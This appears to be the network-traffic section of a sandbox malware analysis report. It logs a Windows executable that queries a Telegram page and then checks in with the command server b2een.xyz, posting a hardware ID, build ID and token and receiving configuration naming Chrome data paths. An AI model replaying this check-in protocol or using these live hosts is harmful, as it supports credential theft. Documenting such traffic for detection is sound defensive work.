Nov 25, 2024 10:59:27.008152962 CET	443	49736	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:27.922406912 CET	443	49736	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:27.922435045 CET	443	49736	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:27.922466993 CET	49736	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:27.922475100 CET	443	49736	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:27.922492027 CET	49736	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:27.922525883 CET	443	49736	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:27.922534943 CET	49736	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:27.922571898 CET	49736	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:27.923508883 CET	49736	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:27.923522949 CET	443	49736	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:27.929955959 CET	49742	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:27.929990053 CET	443	49742	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:27.930061102 CET	49742	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:27.930232048 CET	49742	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:27.930243015 CET	443	49742	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:29.426024914 CET	443	49742	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:29.426116943 CET	49742	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:29.426934958 CET	49742	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:29.426943064 CET	443	49742	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:29.428666115 CET	49742	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:29.428673029 CET	443	49742	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:30.343578100 CET	443	49742	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:30.343653917 CET	49742	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:30.343662024 CET	443	49742	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:30.343707085 CET	49742	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:30.343938112 CET	49742	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:30.343955040 CET	443	49742	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:30.419604063 CET	49748	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:30.419682980 CET	443	49748	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:30.419766903 CET	49748	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:30.419992924 CET	49748	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:30.420041084 CET	443	49748	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:31.411920071 CET	49754	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:31.411956072 CET	443	49754	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:31.412028074 CET	49754	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:31.412336111 CET	49754	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:31.412350893 CET	443	49754	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:31.860424995 CET	443	49748	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:31.860976934 CET	49748	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:31.861372948 CET	49748	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:31.861398935 CET	443	49748	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:31.863042116 CET	49748	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:31.863058090 CET	443	49748	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:31.863127947 CET	49748	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:31.863145113 CET	443	49748	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:32.856925964 CET	443	49754	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:32.857012033 CET	49754	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:32.857557058 CET	49754	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:32.857568026 CET	443	49754	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:32.868839979 CET	49754	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:32.868849039 CET	443	49754	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:32.935924053 CET	443	49748	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:32.936001062 CET	443	49748	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:32.936013937 CET	49748	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:32.936063051 CET	49748	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:32.952091932 CET	49748	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:32.952121973 CET	443	49748	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:33.416012049 CET	443	49754	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:33.416080952 CET	49754	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:33.416088104 CET	443	49754	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:33.416134119 CET	49754	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:33.422344923 CET	49754	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:33.422363997 CET	443	49754	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:33.440625906 CET	49760	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:33.440668106 CET	443	49760	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:33.440740108 CET	49760	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:33.441050053 CET	49760	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:33.441073895 CET	443	49760	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:34.885910988 CET	443	49760	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:34.885977030 CET	49760	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:34.886413097 CET	49760	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:34.886425018 CET	443	49760	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:34.888118029 CET	49760	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:34.888129950 CET	443	49760	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:35.824454069 CET	443	49760	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:35.824476004 CET	443	49760	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:35.824549913 CET	443	49760	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:35.824558020 CET	49760	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:35.824618101 CET	49760	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:35.864073992 CET	49760	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:35.864097118 CET	443	49760	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:35.942848921 CET	49766	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:35.942902088 CET	443	49766	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:35.943048000 CET	49766	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:35.943484068 CET	49766	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:35.943526030 CET	443	49766	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:37.350146055 CET	443	49766	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:37.350230932 CET	49766	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:37.350670099 CET	49766	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:37.350689888 CET	443	49766	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:37.352510929 CET	49766	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:37.352525949 CET	443	49766	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:38.260823011 CET	443	49766	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:38.260852098 CET	443	49766	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:38.260930061 CET	443	49766	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:38.260932922 CET	49766	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:38.260934114 CET	49766	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:38.261008978 CET	49766	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:38.277553082 CET	49766	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:38.277602911 CET	443	49766	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:38.474679947 CET	49772	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:38.474740028 CET	443	49772	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:38.474797964 CET	49772	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:38.475101948 CET	49772	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:38.475122929 CET	443	49772	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:39.968992949 CET	443	49772	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:39.969141006 CET	49772	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:39.969624996 CET	49772	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:39.969652891 CET	443	49772	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:39.971324921 CET	49772	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:39.971338034 CET	443	49772	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:40.873087883 CET	443	49772	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:40.873193026 CET	443	49772	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:40.873193026 CET	49772	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:40.873241901 CET	49772	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:40.874603987 CET	49772	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:40.874629974 CET	443	49772	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:41.516524076 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:41.516577005 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:41.516784906 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:41.517090082 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:41.517096043 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:43.011919022 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:43.011996031 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:43.012471914 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:43.012476921 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:43.014466047 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:43.014471054 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:43.014523029 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:43.014539957 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:43.014583111 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:43.014589071 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:43.014657974 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:43.014664888 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:43.014682055 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:43.014694929 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:43.014714003 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:43.014720917 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:43.014789104 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:43.014796972 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:43.014813900 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:43.014890909 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:43.014897108 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:43.014909029 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:43.014987946 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:43.017482996 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:43.017489910 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:44.938520908 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:44.938628912 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:44.938702106 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:44.938741922 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:44.939101934 CET	49778	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:44.939121962 CET	443	49778	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:44.986538887 CET	49789	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:44.986589909 CET	443	49789	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:44.986660957 CET	49789	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:44.986874104 CET	49789	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:44.986882925 CET	443	49789	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:46.428802967 CET	443	49789	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:46.428886890 CET	49789	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:46.429261923 CET	49789	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:46.429280996 CET	443	49789	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:46.431241989 CET	49789	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:46.431256056 CET	443	49789	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:47.352756023 CET	443	49789	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:47.352849007 CET	49789	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:47.352915049 CET	443	49789	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:47.352955103 CET	443	49789	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:47.352987051 CET	49789	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:47.353022099 CET	49789	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:47.353061914 CET	49789	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:47.353095055 CET	443	49789	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:47.354494095 CET	49795	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:47.354533911 CET	443	49795	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:47.354635000 CET	49795	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:47.354825020 CET	49795	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:47.354840040 CET	443	49795	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:48.805393934 CET	443	49795	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:48.805474043 CET	49795	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:48.805784941 CET	49795	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:48.805790901 CET	443	49795	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:48.807348013 CET	49795	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:48.807353020 CET	443	49795	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:49.735449076 CET	443	49795	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:49.735536098 CET	49795	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:49.735560894 CET	443	49795	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:49.735609055 CET	49795	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:49.735677004 CET	443	49795	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:49.735702991 CET	49795	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:49.735713005 CET	443	49795	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:49.735727072 CET	49795	443	192.168.2.5	49.13.32.95

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 10:59:15.319109917 CET	64308	53	192.168.2.5	1.1.1.1
Nov 25, 2024 10:59:15.455929041 CET	53	64308	1.1.1.1	192.168.2.5
Nov 25, 2024 10:59:17.492124081 CET	53231	53	192.168.2.5	1.1.1.1
Nov 25, 2024 10:59:17.819901943 CET	53	53231	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 10:59:15.319109917 CET	192.168.2.5	1.1.1.1	0x26fc	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Nov 25, 2024 10:59:17.492124081 CET	192.168.2.5	1.1.1.1	0xcafe	Standard query (0)	b2een.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 10:59:15.455929041 CET	1.1.1.1	192.168.2.5	0x26fc	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Nov 25, 2024 10:59:17.819901943 CET	1.1.1.1	192.168.2.5	0xcafe	No error (0)	b2een.xyz		49.13.32.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

b2een.xyz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	149.154.167.99	443	6544	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 09:59:16 UTC	86	OUT	GET /fu4chmo HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 09:59:17 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 09:59:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12310 Connection: close Set-Cookie: stel_ssid=79bc00fdaeeccffade_15532374269387259153; expires=Tue, 26 Nov 2024 09:59:17 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-11-25 09:59:17 UTC	12310	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 66 75 34 63 68 6d 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @fu4chmo</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49717	49.13.32.95	443	6544	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 09:59:20 UTC	224	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 09:59:20 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 09:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 09:59:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49724	49.13.32.95	443	6544	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 09:59:22 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 09:59:22 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 43 32 43 37 31 31 45 42 36 41 32 31 37 36 32 31 38 33 38 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 63 30 32 65 66 65 31 63 66 62 32 61 36 32 66 33 36 66 33 33 66 66 66 30 32 37 34 66 62 34 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 2d 2d 0d Data Ascii: ------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="hwid"40C2C711EB6A2176218386-a33c7340-61ca------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="build_id"fc02efe1cfb2a62f36f33fff0274fb41------JEBKJDAFHJDGDHJKKEGI--
2024-11-25 09:59:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 09:59:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 09:59:23 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 62 64 32 35 61 30 62 31 64 36 38 39 38 64 37 34 63 65 36 31 35 64 65 36 37 61 31 36 31 61 61 33 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|bd25a0b1d6898d74ce615de67a161aa3\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49730	49.13.32.95	443	6544	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 09:59:24 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 09:59:24 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 35 61 30 62 31 64 36 38 39 38 64 37 34 63 65 36 31 35 64 65 36 37 61 31 36 31 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 63 30 32 65 66 65 31 63 66 62 32 61 36 32 66 33 36 66 33 33 66 66 66 30 32 37 34 66 62 34 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="token"bd25a0b1d6898d74ce615de67a161aa3------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build_id"fc02efe1cfb2a62f36f33fff0274fb41------FCGIJDBAFCBAAKECGDGCCont
2024-11-25 09:59:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 09:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 09:59:25 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49736	49.13.32.95	443	6544	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 09:59:27 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
